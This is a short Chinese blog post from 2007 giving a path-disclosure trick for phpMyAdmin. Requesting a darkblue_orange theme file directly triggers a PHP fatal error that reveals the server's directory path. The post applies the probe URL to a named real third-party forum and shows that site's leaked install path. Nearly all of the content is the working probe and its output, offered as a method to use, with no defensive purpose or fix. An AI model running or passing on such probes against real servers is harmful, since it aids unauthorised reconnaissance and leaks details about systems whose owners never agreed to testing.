本文介绍了phpMyAdmin中的一种路径暴露方法,通过特定URL可以获取到服务器上的文件路径信息。测试示例显示了如何利用这一漏洞来暴露出layout.inc.php文件的位置。
phpmyadmin爆路径
2007年12月09日 星期日 18:10
|
phpmyadmin爆路径方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php 测试地址: http://bbs.pjhome.net/phpmyadmin/themes/darkblue_orange/layout.inc.php Fatal error: Call to a member function getImgPath() on a non-object in d:/wwwroot/pjforumXP/wwwroot/phpmyadmin/themes/darkblue_orange/layout.inc.php on line 67 又测试了下 |
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
